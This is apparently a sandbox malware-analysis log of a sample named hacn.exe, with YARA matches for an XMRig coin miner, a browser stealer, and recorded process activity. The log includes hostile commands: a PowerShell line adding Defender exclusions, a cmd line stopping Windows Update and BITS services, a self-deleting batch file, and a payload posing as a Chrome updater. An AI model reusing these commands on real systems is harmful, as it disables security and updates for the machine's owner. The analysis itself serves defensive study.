Source: C:\Windows\System32\dialer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll

Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: main.exe.4.dr, utils.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Update.exe.5.dr, utils.cs	Cryptographic APIs: 'CreateDecryptor'

Source: main.exe.4.dr, BrowserStealer.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: main.exe.4.dr, utils.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: main.exe.4.dr, utils.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Update.exe.5.dr, utils.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Update.exe.5.dr, utils.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Update.exe.5.dr, BrowserStealer.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: setup.exe, 00000006.00000002.1730634799.00007FF617A69000.00000004.00000001.01000000.0000000C.sdmp, setup.exe, 00000006.00000002.1729709589.000002A767720000.00000004.00000001.00020000.00000000.sdmp, setup.exe, 00000006.00000000.1678821594.00007FF617A69000.00000008.00000001.01000000.0000000C.sdmp, updater.exe, 00000019.00000002.1796934225.00007FF692C29000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: .SlnIX
Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: .pptx.odt.csv.sql.mdb.sln.php

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@78/35@3/3

Source: C:\Users\user\Desktop\hacn.exe

Code function: 0_2_00007FF61D328570 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF61D328570

Source: C:\Windows\System32\dialer.exe	Code function: 17_2_00007FF65A13226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,		17_2_00007FF65A13226C
Source: C:\Windows\System32\dialer.exe	Code function: 45_2_00007FF7C6D6226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,		45_2_00007FF7C6D6226C

Source: C:\Windows\System32\dialer.exe

Code function: 17_2_00007FF65A1319C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

17_2_00007FF65A1319C4

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Code function: 4_2_000FA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

4_2_000FA6C2

Source: C:\ProgramData\setup.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: C:\ProgramData\main.exe

File created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\ProgramData\main.exe	Mutant created: \Sessions\1\BaseNamedObjects\CosturaA54E036D2DCD19384E8EA53862E0DD8F
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\dialer.exe	Mutant created: \BaseNamedObjects\Global\vwsnnrazkcwzikmi

Source: C:\Users\user\Desktop\hacn.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75722

Jump to behavior

Source: C:\ProgramData\main.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Command line argument: sfxname	4_2_000FDF1E
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Command line argument: sfxstime	4_2_000FDF1E
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Command line argument: STARTDLG	4_2_000FDF1E

Source: hacn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7748
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7748
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7748
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7748
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\hacn.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: hacn.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\hacn.exe

File read: C:\Users\user\Desktop\hacn.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hacn.exe C:\Users\user\Desktop\hacn.exe
Source: C:\Users\user\Desktop\hacn.exe	Process created: C:\Users\user\Desktop\hacn.exe C:\Users\user\Desktop\hacn.exe
Source: C:\Users\user\Desktop\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Program Files\Google\Chrome\updater.exe C:\Program Files\Google\Chrome\updater.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\main.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hacn.exe	Process created: C:\Users\user\Desktop\hacn.exe C:\Users\user\Desktop\hacn.exe	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"	Jump to behavior
Source: C:\ProgramData\main.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"

Source: C:\Users\user\Desktop\hacn.exe

File opened: C:\Users\user\Desktop\pyvenv.cfg

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: hacn.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: hacn.exe

Static file information: File size 12925322 > 1048576

Source: hacn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: hacn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: hacn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: hacn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: hacn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: hacn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: hacn.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: hacn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: s.exe, 00000004.00000000.1661323675.0000000000113000.00000002.00000001.01000000.00000006.sdmp, s.exe, 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000000.00000003.1643673285.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
